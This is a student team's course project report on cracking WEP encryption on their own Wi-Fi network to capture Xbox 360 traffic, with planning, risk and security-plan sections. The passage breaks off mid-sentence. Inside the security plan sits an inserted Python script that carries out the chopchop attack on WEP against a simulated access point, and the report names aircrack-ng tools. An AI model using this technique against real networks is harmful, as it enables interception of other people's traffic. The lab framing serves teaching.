Blake Michener, Bryan Beech, Eric Gibbs, Hunter Walker, Matt DeRosa, Kevin Foldes TEAM CLOCKWORK SRA 221 PROJECT
Page 1
Table of Contents
Executive Summary 2
Memorandum of Understanding 3
Requirements Documentation 6
Risk Assessment and Mitigation Plan 11
Proposal 15
Detailed Security Plan 16
Technical Implementation 35
Appendix of Detailed Setup Instructions 37
Appendix of Problems 39
Executive Summary
Problem
Team Clockwork set out to crack WEP wireless encryption, capture Microsoft Xbox 360
packets streaming over the network, and analyze them in Wireshark.
Solution
After initial setbacks with BackTrack 5 and the first round of Kali Linux attempts, team
members were able to isolate Xbox traffic using the Fern Wi-Fi Cracker software. The
successful capture was performed by bridging the attacking laptop and the Xbox 360 console,
isolating the console's network traffic, running a chopchop attack against the WEP
encryption, and recording the results in Wireshark. Ultimately, a number of different packets
and handshakes were recorded, ranging from basic network traffic to encrypted handshakes for
services like Netflix and finally Xbox Live account handshakes. Recovering the WEP key exposes
the link-layer frames; the application-layer handshakes themselves remained encrypted. As
further detailed in the Technical Implementation document and the presentation, Team
Clockwork's approach to cracking WEP encryption on the Xbox's network is the best fit for the
problem because it is easy to follow, repeatable, reliable, and evolved out of the real-world
challenges and successes encountered during this term project.
Team Clockwork Members
Blake Michener (bdm5125)
Eric Gibbs (emg5361)
Hunter Walker (hzw5097)
Bryan Beech (bwb5287)
Kevin Foldes (krf5170)
Matt DeRosa (mmd5271)
Memorandum of Understanding
The purpose of our project is to break into an encrypted wireless network that has been
set up by us for this purpose. We will then leverage the cracked network to intercept data that
is being streamed from a wireless router via Wi-Fi to an Xbox gaming console. We are also
looking to gain experience with the Kali Linux tool set, specifically Fern. Throughout this
project, we also want to obtain a greater understanding of the fundamentals of wireless
encryption and Wi-Fi in general.
The problem being addressed in our project is the extent to which the connection between an
encrypted wireless network and an Xbox gaming console is vulnerable. The focus of our project
will be the Xbox-to-router connection, and to what extent our tools and knowledge can intercept
and manipulate data on that connection. Research into the protocols used to transfer data to
and from the Xbox will be a high priority in organizing a successful breach. If successful, the
information gained from accessing this supposedly secure connection would allow Microsoft to
remediate the flaws and exploits involved and deter security breaches by outside threats.
Primary stakeholders for the Kali project include Microsoft, Xbox game developers,
Internet service providers, router manufacturers, end users, hackers, Kali developers and the
members of Team Clockwork. Should this project successfully intercept user data from an Xbox
over a wireless network, this may reveal a crucial security flaw for all businesses involved,
whether they develop the gaming console, software for it, or simply provide the wireless
connection and infrastructure. Any of these corporate stakeholders may find the team's
discoveries useful for their own intrusion testing and vulnerability assessment purposes,
potentially averting a costly breach of their customers' confidentiality. Alternatively, if the
team encounters difficulty in intercepting the wireless data, it may confirm the confidentiality
of their systems and serve as a practical proof of their existing security measures. The users
of the Xbox console and wireless networks are also stakeholders, as the project may expose
issues that positively or negatively impact their experience using a wireless-reliant Xbox or
other device. Similarly, those seeking to exploit these networks could find the project a boon
or a bane: it may expose a flaw they have already been exploiting for nefarious purposes or
confirm that the existing system is sufficiently secure. Those responsible for coding the Kali
Linux distribution and the tools used within the project may also be considered stakeholders.
Any flaws exploited through their code could either generate interest in their work or create an
immense backlash against it for enabling hackers to exploit the Xbox console's vulnerabilities.
Finally, the Team Clockwork members are key stakeholders, as the project's success will largely
determine our grade and enjoyment of the SRA 221 course.
The timeline of this project will consist of all team members coordinating and working
together in order to meet the deadlines assigned by the professor. In order for our group
project to run smoothly, a lot of research will need to be done so that group members fully
understand our topic. In about two weeks our group will be able to fully understand the inner
workings of the Kali tools, especially Fern. After fully understanding how to penetrate
networks, we will research the wireless network capabilities of Microsoft's Xbox, which should
take about one week. This step should not be too difficult, because an Xbox's MAC and IP
addresses can be read directly from the console's network settings. The protocols used to
transfer data will also need to be researched, which will allow our group to fully understand
how to crack a wireless network that is streaming to an Xbox console. Team Clockwork predicts
that all members will have full knowledge of the task at hand in about a month and a half. With
the leadership of our team leader along with the determination of all the team members, Team
Clockwork will be able to fully understand the project topic and meet the deadlines.
Measurements of success will be based upon our ability to gain access to the network the
Xbox and router are communicating on, intercept various packets being sent, and decrypt some
of those packets to reveal user-sensitive data, such as logon information, credit card details,
or any other useful encrypted data. By revealing this data, we would have exposed a major flaw
in the security of Xbox consoles. This is important because millions of people store credit
card information on their systems, and when those systems communicate with Xbox servers over
the Internet there is a possibility of personal information being leaked to unauthorized
entities.
Requirements Documentation
Purpose and Explanation
Interfaces
Multiple interfaces will be needed to achieve our objective of breaching a WEP-encrypted
Wi-Fi network. The most vital interface will be our virtual machine Linux interface. This VM
interface will allow us to access Kali Linux and the other programs needed to break the WEP
encryption. Another essential interface will be Kali Linux itself, which carries the tools that
will actually break the WEP encryption of our target network. The target interface, an Xbox 360
streaming data, will be used as well. We will configure a large transfer of data from an Xbox
Live streaming service via our target Wi-Fi network, initiated on the Xbox. Another interface
will be the Linksys network configurator, which will allow us to precisely adjust our network's
security so that we can configure Kali Linux to counter it successfully.
Functional Capabilities
In order for our project to succeed in capturing data from an Xbox 360, we will need to
have a few things functioning properly first. We will need a functioning Xbox 360 with online
capabilities. We will also need a functioning virtual machine with a Linux interface. On this
virtual machine we will need Kali Linux installed to break the WEP encryption. With these
things we will be able to use the Fern program from Kali Linux on a virtual Linux system to
intercept and crack wireless data sent to an Xbox 360.
Performance Levels
ClockWork expects to maintain a high performance level during the execution of our
mission. We have multiple laptop computers that will maintain the required processing power to
utilize Kali Linux so our project will remain consistent and not be interrupted. When our
computers utilize the Kali Linux program we expect it to comply with the security and quality
standards we have set for our project. If at any time the performance level decreases we will
reanalyze our structure and adjust accordingly to meet our specified criteria and performance
level.
Data Structures/Elements
As the scope of the project does not involve coding or the use of any proprietary software, it
is unlikely that the team will be required to generate data structures or define elements. Interfaces
and software used during the course of the project will undoubtedly involve various forms of
self-contained elements and structures that the team may wish to familiarize themselves with, but
it is unlikely that knowledge of structures outside of basic arrays will be necessary, and only for
sorting data.
Safety
Team ClockWork's motive is to intercept data that is being streamed from a wireless
router via Wi-Fi to an Xbox gaming console, focusing mainly on streaming services such as
Netflix or Hulu. The aspect of safety for this project needs to be considered carefully when
intercepting data. The main focus of our project may raise some issues concerning safety in
relation to Microsoft's Terms of Use. The No Unlawful or Prohibited Use section of Microsoft's
Terms of Use states that "Using a service in any fashion that could damage, disable, or
overload Microsoft's network, or affecting another party's service cannot be conducted."
(Microsoft).
Since we will be trying to intercept data from an Xbox, there are certainly some risks
involved. We are not the owners of the data, which may imply that we would be stealing this
information. This can be considered unlawful or prohibited, which may raise flags during parts
of our project. There are Microsoft guidelines and rules by which we need to abide in order to
make sure that we do not violate Microsoft's Terms of Use.
In order to assure that the work we will be doing in our project abides by these terms, we
must be certain that we do not perform any procedures that would be damaging to the Microsoft
servers. In addition to this, we cannot do anything that would negatively affect Microsoft’s
servers or networks during the data interception steps.
Reliability
We need to ensure that we conduct our procedures in a way that works every time they are
attempted. When we write down the steps needed to reach our mission goal, we need to be clear
and precise so that no future attempt to recreate the situation fails. The instructions must be
written legibly so as not to confuse readers. We also have to make sure our methods of capturing
the target packets are correct in their steps, enabling a user who follows these methods to
produce a viable result every time. If we do not verify our procedure multiple times we run the
risk of losing our credibility in this project.
One major point to consider about reliability is ensuring the connection to our virtual
machines. Our virtual machines are what allow us to capture packets being sent by the Xbox
through the router. If access to this resource is interrupted during the procedure, we have
failed to provide reliability for our project. The methods are required to work 100% of the
time; if this is not accomplished it would be a great pitfall for our project. Reliability is
one of the most important aspects of this project and our group will work with great regard
for it.
Security/Privacy
Due to the sensitive nature of breaching WEP encryption and capturing data from an
Xbox console, Team ClockWork faces practical concerns relating to security and privacy. First,
since the team will be exploiting vulnerabilities within their own Wi-Fi connections and related
devices, they must be careful to avoid inadvertently exposing their own equipment and private
information to outside threats. Precautions should be taken to ensure that all major interfaces
used in the project, such as Kali Linux and the network configurator, are themselves
secure before attempting to proceed. ClockWork must also outline precautions and guidelines
before commencing data capture to avoid accidentally violating the privacy of anyone within the
group. The team must work to ensure that Kali Linux and the associated tools are only being
used to monitor, capture data, and break encryption on team owned and operated devices, so as
not to interfere with the privacy and security of others. Failure to do so could incur serious legal
liabilities and threaten the project’s success and legitimacy. Finally, touching back to issues
raised in the Safety section, the team must be cautious to avoid any action that could be
construed as damaging towards Microsoft’s data and network systems, since doing so would
grievously impact the security and operations of the project.
Quality
In terms of quality for this project, we expect the data we intercept to be significant.
We expect to intercept data such as user information, which will require filtering out any
non-essential data collected in the process. Valuable information will be separated from
worthless data and translated into an understandable format. The information acquired is
expected to be valuable enough to be deemed a security risk, so that we can state that valuable
information can be acquired through these actions.
Constraints and Limitations
We will be constrained by our team's lack of previous experience with network hacking
and a need to practice our approach and work around technical problems that are bound to arise.
The strength of the encryption is a limitation to our goal as well, since the stronger the
encryption, the more difficult it is to crack and the more expertise that is required. Certain
encryption schemes could exceed the processing power and capabilities available to the cracking
tools in Kali Linux. Even if the tools can handle the encryption, the time it would take could
be prohibitively long as well, leading to a need for another plan.
Risk Assessment & Mitigation Plan
What software and systems are present on the network?
Laptop computer
■ It could contain malware prior to use that affects data and processes carried out at a later time.
■ It could crash and ruin the current operation.
■ It could have monitoring hardware or software installed, such as keystroke loggers and Internet
history loggers.
VMware server
■ Security could be compromised by a third party that has found a way in through the network and firewalls.
■ It could be compromised by an entity inside PSU with access to the server room; a direct uplink can bypass
the majority of the protocols.
■ Bot attacks could potentially crash the server via DDoS or use servers and terminals in a bot attack on
another network.
Kali Linux
■ The software could be corrupted by a virus or other means, hindering our hacking efforts.
Wireless Router
■ Used as means to transmit data around the network wirelessly and provide an internet connection.
■ Unless specifically targeted by physical tampering or a corrupting program, it is relatively immune to
failure aside from the phasing out of its wireless standard and the manufacturer's planned obsolescence.
Xbox Console
■ Tethered to the Wi-Fi network and is the target of the hack we are going to perform.
■ Xbox Live authentication is strong (it uses Kerberos); the wireless link itself is only as strong as the
router's encryption, which is WEP in our setup.
■ While capable of getting a virus, Microsoft keeps a degree of separation between the Xbox and the pure,
unfiltered Internet that you get on your laptop.
■ Virus penetration would most likely have to come through Microsoft Xbox Live’s servers to affect
consoles effectively.
■ Although they have improved dramatically in recent product iterations, Xboxes have a noticeably higher
hardware failure rate compared to other consoles and computers. So there is always a risk of it failing
permanently.
■ Malware introduction from a real-world entity via the USB ports on the console is possible as well,
albeit very unlikely.
What systems are vulnerable on the current network?
Why are they vulnerable?
■ The network is vulnerable because Microsoft uses a well-documented authentication system with its
Xbox gaming platform, Kerberos, a symmetric-key (shared-secret) protocol whose tickets can be
encrypted with AES. Kerberos itself is not a PKI: it relies on a trusted key distribution center
rather than certificates.
■ If the authentication server (the key distribution center) is compromised, an attacker can impersonate
any user.
■ It is still vulnerable to password-guessing attacks.
■ It also does not prevent denial-of-service attacks.
What types of solutions are available to mitigate the risks?
Hardware or Software? What kind?
■ In order to assure that the Laptop computer we are using isn’t infected with Malware or Viruses we must
set up Anti-Virus and Anti-Malware software on the Laptop. By doing this we can run scans every time
we use the computer to ensure the computer’s in a good state at all times.
What’s the cost?
■ Since a group member of ours has Xfinity internet we have access to downloading the full Norton
Security Suite for free. In the free Security suite, you get everything you would by paying for the full
premier package. This package provides the following: “Core Protection”: Which is protection against
Viruses, spyware, trojan horses, worms, bots, and rootkits. It also protects against browser and application
threats, and protects you from infected websites. Another great protection feature it has is the networking
feature. Which helps secure and monitor your home network, it also automatically secures your PC when
connecting to public Wi-Fi. It also has many other features that we won't really use, such as identity
protection, PC tuneup and support for these features.
What does it do?
■ Antivirus and Anti-Malware software utilizes signature based detection of malicious code for established
threats and heuristics to detect, prevent, and eliminate threats from newer forms of malware, trojans,
viruses, root kits, and tracking cookies. Signature based detection relies on updating a software catalog of
threat definitions distributed by the software’s developers containing known patterns of malicious code
and executables. The software scans the host system for any matches within the archived database to
prevent and eliminate threats in real time or at scheduled intervals. Suspicious code is isolated or deleted
upon detection and the system’s user is notified of the security breach. Heuristics relies on “rules of
thumb” to recognize similar patterns of coding and variations on established threats to prevent new
viruses or new variations of threats from affecting the host system. Just as with signature based detection,
the software will isolate or delete the threat upon detection, as well as notify the software developer of
the new threat.
How long will it take to implement?
■ It will not take very long to implement the Anti-Virus and Anti-Malware. Once we access Xfinity’s
website all we have to do is download the Security Suite and install it. This could take anywhere from 10-
15 minutes to a few hours depending on the size of the download and the internet speeds we are using.
Is implementation feasible?
■ Implementation and maintenance is easily feasible due to low to no cost, minimum time investment, and
the simple upkeep of the outlined plan. As mentioned, adequate protection is available through
complimentary copies of the Norton Security Suite, which is simple and intuitive software to use.
Group members will run the required scans to minimize the risk to all systems involved in the project and
maintain up-to-date threat catalogs. Since many of these steps are already common practice for group
members outside of the scope of the project, there are no expected difficulties in implementing the
mitigation plan. Running the Norton software will require limited system overhead, but this is not
anticipated to be a serious performance concern.
Will implementation disrupt current business operations?
■ Implementation will not disrupt the current business operations at a high level. Using Anti-Malware and
Anti-Virus software is an essential step in the operations for our project. The only disruption
implementation will introduce is simply the time it will take to run virus scans. If the software detects
viruses this will cause a serious disruption in our operations, but it is better for a virus to be detected than
our group members not knowing about it.
Team Clockwork Proposal
Our team is planning on using the Fern program from Kali Linux on a virtual Linux
system to intercept and crack wireless data being sent to an Xbox 360 gaming console. We will
set up a large data transfer on a LAN from a streaming service such as Netflix or Hulu and while
streaming to the console, we will use Fern to crack the WEP encryption and access the data
being transmitted. We will document our decryption process with a camera to demonstrate our
success.
Detailed Security Plan
Technical Security Policy & Baseline
Technical Details and System Setup
The first technical security aspect of our system is the Wi-Fi network. It will be configured to
use WEP encryption and made visible to all scans for Wi-Fi networks. The Xbox will be tethered
to the Wi-Fi via its built-in network configuration settings, which require selecting WEP
encryption and entering the WEP key. The SSID of the Wi-Fi network is Grapes; the subnet mask
and default gateway are left at their standard settings, and the proxy server settings will be
left alone as well. Once the console is connected to the Wi-Fi, data transmission will begin
between the Xbox Live servers and the console. A large amount of data will be downloaded on the
Xbox via an application of our choosing, like Netflix, Hulu or HBO. Additionally we will have
our attacking machine on the Wi-Fi as well. Kali Linux, the distribution that carries our Wi-Fi
cracking tools, will be booted from a thumb drive on the attacking machine and configured to
break into our network. Since we are booting from a thumb drive, we reduce the risk of anything
backfiring on the attacking machine's actual system or data. Microsoft's servers use Kerberos as
the ticket-granting service for Xbox consoles querying their databases for information. That
protection is end to end between the console and Microsoft; on the air, the only additional
protection the frames receive is the router's WEP encryption. WEP is weak and fairly easy to
break, so the link-layer frames can be recovered, but anything the console encrypts at the
application layer (the Kerberos exchange itself, or TLS used by a streaming service) stays
encrypted after the WEP key is recovered and must be analyzed separately. The attacking machine
will run Symantec antivirus to reduce the risk of picking up anything from the Internet.
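To make concrete why the WEP link is the weak point, the following Python script is an added
example written for this edit; it is not part of the original report and is not the code of
Fern or any other Kali tool. It builds a minimal WEP encryptor (RC4 keyed with IV||key, CRC-32
ICV) and then runs the chopchop attack named in the Executive Summary against a frame, using a
decryption oracle that stands in for the access point (a real AP reveals validity by relaying or
dropping the injected frame; the oracle here knows the key only so that the script runs
offline). KEY, IV and PAYLOAD are constructed sample values. The attack recovers the keystream
and plaintext one byte at a time from the end of the frame without ever learning the key, which
is why a longer WEP key does not help.

```python
import struct

# --- CRC-32 (reflected form, polynomial 0xEDB88320) as used for the WEP ICV ---
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)

# chopchop relies on the high byte of the table being unique per index, so the
# last plaintext byte of a frame identifies which table entry produced it
INV_HIGH = {CRC_TABLE[i] >> 24: i for i in range(256)}
assert len(INV_HIGH) == 256


def crc32(data: bytes) -> int:
    r = 0xFFFFFFFF
    for b in data:
        r = (r >> 8) ^ CRC_TABLE[(r ^ b) & 0xFF]
    return r ^ 0xFFFFFFFF


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream generation, XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body: 3-byte IV, key-id byte, then RC4(IV||key) over plaintext||ICV."""
    body = plaintext + struct.pack("<I", crc32(plaintext))
    return iv + b"\x00" + rc4(iv + key, body)


def wep_decrypt(key: bytes, frame: bytes):
    """Plaintext if the ICV verifies, else None; this is the check an AP performs."""
    iv, body = frame[:3], frame[4:]
    plain = rc4(iv + key, body)
    if len(plain) < 4:
        return None
    data, icv = plain[:-4], plain[-4:]
    return data if struct.pack("<I", crc32(data)) == icv else None


def chopchop(frame: bytes, accepts) -> dict:
    """Recover keystream bytes from the tail of a frame using only an accept/reject oracle.

    Each round drops the last ciphertext byte and guesses the plaintext byte that was
    there. CRC-32 is affine over GF(2), so a valid ICV for the shortened frame is
    obtained by XORing a 4-byte mask that depends only on that guess into the new tail;
    the AP accepts exactly one of the 256 candidates. Returns {body_offset: keystream_byte}.
    """
    header, cur = frame[:4], bytearray(frame[4:])
    keystream = {}
    while len(cur) > 4:                    # stop when only the empty-message ICV is left
        pos = len(cur) - 1
        trunc = cur[:-1]
        for guess in range(256):
            i = INV_HIGH[guess ^ 0xFF]     # table entry implied by the guessed ICV byte
            mask = ((CRC_TABLE[i] & 0xFFFFFF) << 8) | (i ^ 0xFF)
            cand = bytearray(trunc)
            tail = struct.unpack("<I", bytes(cand[-4:]))[0] ^ mask
            cand[-4:] = struct.pack("<I", tail)
            if accepts(header + bytes(cand)):
                keystream[pos] = cur[pos] ^ guess   # ciphertext XOR plaintext
                cur = cand                          # now a valid, one-byte-shorter frame
                break
        else:
            raise RuntimeError("no guess accepted; oracle is not a WEP ICV check")
    return keystream


def recover_plaintext(frame: bytes, accepts, known_prefix: bytes) -> bytes:
    """Full plaintext without ICV: chopchop gives the tail keystream, the known
    LLC/SNAP header at the start of every data frame gives the first bytes."""
    body = frame[4:]
    ks = chopchop(frame, accepts)
    for p, k in enumerate(known_prefix):
        ks[p] = body[p] ^ k
    return bytes(body[p] ^ ks[p] for p in range(len(body) - 4))


# Constructed sample values; the attacker side below never reads KEY.
KEY = bytes.fromhex("0102030405")               # 40-bit WEP key
IV = bytes.fromhex("0a0b0c")
LLC_SNAP = bytes.fromhex("aaaa030000000800")    # LLC/SNAP header, IPv4 ethertype
PAYLOAD = LLC_SNAP + b"xbox live ticket"


def demo() -> bytes:
    frame = wep_encrypt(KEY, IV, PAYLOAD)
    oracle = lambda f: wep_decrypt(KEY, f) is not None   # stands in for the live AP
    return recover_plaintext(frame, oracle, LLC_SNAP[:4])


if __name__ == "__main__":
    print(demo())
```

The mask depends only on the guessed byte because CRC-32 is affine and the high byte of its
lookup table is a permutation; the first four keystream bytes come from the LLC/SNAP header
that every 802.11 data frame starts with. Fern drives the aircrack-ng suite underneath, and
aireplay-ng's chopchop mode (attack 4) performs this same exchange against the live access
point, then the recovered keystream is used to forge frames that make the AP emit the IVs
needed for key recovery.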
System Baseline
The baseline of the system involves constant connectivity between the router and all devices
connected to it, unless the connected devices are shut off or have their Wi-Fi turned off.
There is a constant stream of data between all of the connected devices, the router and the
Internet. Checking for email, system updates, iMessages and application data all make up parts
of the transmitted data. The Xbox console in particular is off the network most of the time,
since it does not get much use and is therefore shut off. Data streaming patterns are erratic
and vary with usage, online play and entertainment downloads. This is why we will specifically
stream a large amount of data at the time of the break-in, to ensure that we intercept some of
the packets. Normal operation does not involve the use of Kali Linux or an attacking machine on
the Wi-Fi. The devices in the system do not normally interact with one another, let alone
intercept each other's data.
Personnel Security Plan
Because our project topic is intercepting packets that are being sent over a network to a
Microsoft Xbox, the members of our team need to be responsible when performing the necessary
tasks in order to be successful. Team Clockwork will be using Kali Linux in order to intercept
data packets. Kali Linux is made by the creators of BackTrack and is used for penetration
testing. This software offers many tools, including data analysis software, which could cause
harm to others without our group members even knowing. Since Kali Linux has the capability to
negatively affect others, Team Clockwork has set guidelines on how each member of the team
should act while working on the project.
The members of Team Clockwork have agreed to use Kali Linux solely for project purposes.
Each team member is to act in a responsible manner and not take advantage of other team
members or members of the public while using this software. As stated before, Kali Linux is
home to many tools that our team can use. In particular, Team Clockwork anticipates using the
Wireshark, AirSnort, and Reaver tools. These tools are for intercepting data packets, recovering
WEP keys, and breaking Wi-Fi passwords, respectively. Team Clockwork has agreed that no member
of the team shall use these tools against the general public, team members, classmates, or the
Penn State community. These tools will only be used for our project and on a team member's
wireless or Ethernet network.
The main purpose for setting these guidelines is to maintain responsibility and trust
throughout our team. Team members working responsibly will ensure our project runs smoothly
without difficulties. Attached below is a contract our team has come up with to ensure each
member follows the guidelines for the personnel security plan:
Team Clockwork Personnel Security Contract
1. No member of the team shall use any of the tools available to cause harm to any
teammates or the public.
2. The tools used shall only be used for project purposes.
3. Documentation of every step using the Kali Linux software shall be saved.
4. Every member of the team shall be present when using the Kali Linux software.
5. Any team member that does not abide by these rules shall be reported to the professor.
Team Member’s Signatures
Bryan Beech Bryan Beech
Kevin Foldes Kevin Foldes
Eric Gibbs Eric Gibbs
Hunter Walker Hunter Walker
Blake Michener Blake Michener
Matt DeRosa Matt DeRosa
Team Clockwork's Personnel Security Contract is very similar to an Acceptable Use
Policy (AUP). This security contract emphasizes that each team member needs to act in an
appropriate manner or consequences will arise. In order to make sure each team member is
following the guidelines set, Team Clockwork has agreed to all be together when using the Kali
Linux software. The rules stated in the contract relate to an AUP by clearly stating the
guidelines, outlining the penalties of breaking the rules, and having a signature section before
using the software so all team members are familiar with the rules before using the programs on
Kali Linux.
Working with an International Safety Security Management team would be very
beneficial for our team. However, Team Clockwork is not an established business or corporation
and does not need high-priority security measures for this project. Because this is a team
project for a class, the Pennsylvania State University can serve as an ISSN. With Team
Clockwork following the guidelines set, especially the point of documenting our steps, the
Pennsylvania State University will serve as an ISSN if any issues arise. Team Clockwork does
not anticipate using the software for any illegal or harmful actions, only for project
purposes.
Team Clockwork’s personnel security plan’s guidelines also relate to the three main
points from the CIA triangle: confidentiality, integrity, and availability. Confidentiality relates
to the team members only using the software for project purposes. No team member should use
Kali Linux to crack other’s passwords or put anyone’s data privacy at risk. Integrity comes into
play when using only the tools for project purposes and all team members being present when
conducting the necessary steps. The signature section included ensures that each team member
can be trusted and will uphold their integrity. Availability is the last point in the CIA triangle but
is not as important as the prior two. The software lives on one of the team members' personal
computers. Since the contract states that every team member needs to be
present while working with the software, the software will always be available to the team while
working. If an issue arises, such as the software not working correctly, all members of the team
will be present to fix the issue.
Physical Security Plan
The system is going to be physically secured using a laptop computer and a flash drive.
The physical security of the system will be ensured by the separation of the laptop computer
configured to use Kali Linux and the flash drive that the Kali Linux system is installed on.
The laptop computer will remain in Hunter Walker's possession for the entirety of the project,
shared with group members only during set times designated to work on the project. The flash
drive with Kali Linux will be on his person at all times, on his keychain, until it is booted on
the laptop for use. Access to the machine will be limited to group members who have been given
the login credentials for the laptop. Access to the flash drive will also be limited to those
authorized, as it will be password protected. If the flash drive is ever exchanged between team
members for extended periods of time, further security will be put in place: the drive would
then be encrypted with 128-bit encryption paired with a kill-switch program, so that after 3
unsuccessful attempts to enter the correct credentials the drive is wiped and unusable.
Take-home hardware will be accounted for personally by Hunter Walker. As stated above,
the laptop will be in his possession for the entirety of the project; when it is not in his
immediate possession it will be located in his apartment, which will be locked. At no point in
time will the laptop be in the sole possession of anyone outside of Team Clockwork.
Change Management Plan
Hardware and Software Upgrade Plan
Hardware upgrades will be fulfilled on an as-needed basis. If the hardware running Kali
Linux isn’t able to brute-force the security protocols on the router we’re trying to penetrate in a
timely fashion, then we will cluster multiple PCs together in order to combine processing power.
This additional processing power will enable us to penetrate the target router in a reasonable
timeframe.
If any piece of the hardware is found to be functioning incorrectly, that piece of hardware
should be replaced with one in working-condition as soon as possible.
Software upgrades will be implemented as soon as they are publicly available. When they
are, they will be immediately downloaded and installed on the machine responsible for
intercepting packets on the target network. These software upgrades keep our system running as
efficiently as possible and mitigate the risk of failure due to software-related issues.
Performing Maintenance
Maintenance will be performed by the member with the most expertise of the system,
hardware, or software with regards to what type of maintenance task is being performed. For
example, if Kali Linux needs to be upgraded to the latest version, the member of the group with
the most expertise dealing with Kali Linux should be the member designated to upgrade the
operating system.
Credentials
Formal credentials are not required for this project; however, any member intending to
make changes to any part of the system should possess a working knowledge of that piece
of equipment, as well as knowledge of how the system works as a whole. This is so that the
member making changes won’t make changes that cause the system to function incorrectly.
Credential Assignment
Only members within the project group will be allowed to make changes to the system.
Authorized access is a priority because we need to be sure that the system stays in working
order.
Patch Management
Patch management coincides with our software upgrade policy. Patches should be rolled
out as soon as they are available. This policy includes monitoring update streams of the software
we are using, such as Kali Linux, Wireshark, AirSnort, and the Reaver tools. Patch checks should be
performed on a daily basis. This will ensure that functionality in our system stays in working
order.
Privilege Management Plan
Maintaining Integrity
Privilege management will be very easy on our system. We will be using Hunter’s
computer to run Kali Linux. Kali Linux is essentially the successor to BackTrack 5 with an
expanded toolset, so we have opted to use that. Everyone will be able to access this program from
Hunter’s computer locally while working on the project together.
The physical security of the system will be ensured by the separation of the laptop
computer configured to use Kali Linux and the flash drive that the Kali Linux system is installed
on. The laptop computer will remain in Hunter Walker’s possession for the entirety of the project,
shared with group members only during designated times. The flash drive with Kali Linux
will be on Hunter at all times on his keychain. Access to the flash drive will also be limited to
those authorized, as it will be password protected. The drive would then be encrypted
with 128-bit encryption paired with a kill-switch program: after 3 unsuccessful attempts to enter
the correct credentials, the drive will be wiped and rendered unusable.
Access Policies
All group members will have access to the computer locally when working on the project
with Hunter. By doing this we allow everyone to try out Kali Linux and work on the project
together and learn how to use the program. By restricting certain group members we will only
hinder their learning of the new program and understanding of the process of cracking the WEP
and getting the information.
Executive Privilege
There will not be executive privileges, and all group members will have the same
privileges as explained above. The only people who will have “access” are those who are
physically there with Hunter when he runs Kali Linux off of his computer. Also, since Hunter is
the owner and administrator of his computer, he will be considered an executive because he has
overall control of the computer, but the rest of the team will be able to do anything that needs to
be done on his computer with no restrictions.
Backup & Disaster Recovery Plan
Regional Threats
Crime
On campus and off campus, some of the most common crimes in the State College-
University Park area are larceny and burglary. Burglary is defined as illegal entry into a building
with the intent to commit other crimes, while larceny is the illegal act of taking another’s
personal property. In the 2012 calendar year, the Penn State Annual Security Report for 2013
listed a staggering four hundred and fifteen instances of larceny on campus alone, including three
automobiles. Another forty eight instances of burglary were also recorded on campus. In terms of
the greater State College area, burglary and larceny rates are generally regarded as low for the
population, although they tend to spike during periods of time where students are away from
their dorms or apartments. It is also worth noting that the University and town have separate
crime reporting under separate police departments, which may dramatically downplay the overall
rates and trends in minor crimes like larceny.
As a result of the somewhat substantial risk of theft for high-value items like laptops,
computers, and Xbox consoles used within this project, team members should observe prudent
physical security measures and ensure their personal property is adequately secured at all times.
Theft of critical items could result in major delays to the project’s timeline, important
data loss, and a lengthy recovery process. Team members who live off campus should
maintain a similar level of physical security and consider renter’s insurance to offset
some of the cost of potential larceny, if it is not already required by their lease. All team
members should maintain multiple copies of all important data and utilize cloud storage
services to mitigate the risk of loss due to theft or other threats.
Severe Weather
Tornadoes
Tornadoes are a severe weather event characterized by a high speed, rotating column of
air. The high winds and damaging debris produced by tornadoes can destroy or damage
buildings, obliterate critical infrastructure, and constitute a serious threat to human life. While
Happy Valley may seem an unlikely place for such a disaster as it is located far from the
tornado-stricken region of the United States dubbed “Tornado Alley”, Pennsylvania still ranks
among the top twenty five states for tornado occurrences. This totals approximately twenty
damaging tornadoes per year, with Centre County experiencing approximately twelve tornado
events in the past one hundred and twenty nine years. While this rate of occurrence seems
extremely infrequent as it is on the low-middle side of the state’s tornado distribution, it is still a
dangerous event that could have a massive impact on critical project elements and recovery. The
damaging winds and relatively flat terrain of Centre County’s valleys could eviscerate utility
lines over a substantial area and result in a lengthy recovery period. Such outages of power and
internet would be devastating to the team’s project and deadlines.
The risks of tornadoes can best be addressed by team members monitoring current
weather and severe weather threats. Critical devices should be stored in safe and dry locations
under the threat of severe weather and unplugged if there is a risk of voltage spikes. Team
members should also be aware of the threat to their own safety and seek shelter in appropriate
buildings when under tornado watches or warnings. In the event of prolonged power or utility
outages, team members should, if possible, attempt to locate businesses or residences that were
not affected by the disaster and offer free internet connections to continue project development.
Thunderstorms
In the past fifty four years, Centre County has been host to far more damaging
thunderstorms than it has tornadoes. With one hundred and eighty nine being recorded in just the
past fifty four years, this averages out to approximately three and a half thunderstorms with
damaging winds, hail, lightning, and heavy rains per year. All of these phenomena associated
with severe and even moderate storms pose a threat to our team’s equipment, data, and our
ability to perform critical tasks. Just as with tornadoes, the winds and hail can produce property
damage or sever power lines and utilities necessary for our operations. Lightning can also result
in damaging power surges that destroy or disable sensitive electronic devices. Finally, the heavy
rains associated with severe thunderstorms pose a threat to the unique geography of State
College – our area, especially campus, is incredibly prone to flooding. After heavy rain, major
roadways and low-lying buildings are vulnerable and flood waters pose a serious threat to
electronics and electricity.
The risks of thunderstorms can best be addressed similarly to tornadoes or other severe
weather by team members monitoring current weather threats. Critical devices should be stored
in safe and dry locations under the threat of severe weather and unplugged if there is a risk of
voltage spikes, as would occur with frequent lightning strikes in the nearby area. Team members
should also be aware of any threat to their own safety and seek shelter in appropriate buildings if
they are concerned about severe weather conditions. In the event of prolonged power or utility
outages, team members should, if possible, attempt to locate businesses or residences that were
not affected by the disaster and offer free internet connections to continue project development.
Flash Flooding
As mentioned above, Centre County and more specifically State College are at great risk
for serious flooding and water damage. While official records identify only twenty-five flash
floods in the past fifty-four years, a rate of about one flood every two years, this tally mainly
reflects rivers and major water sources overflowing as opposed to the more general water
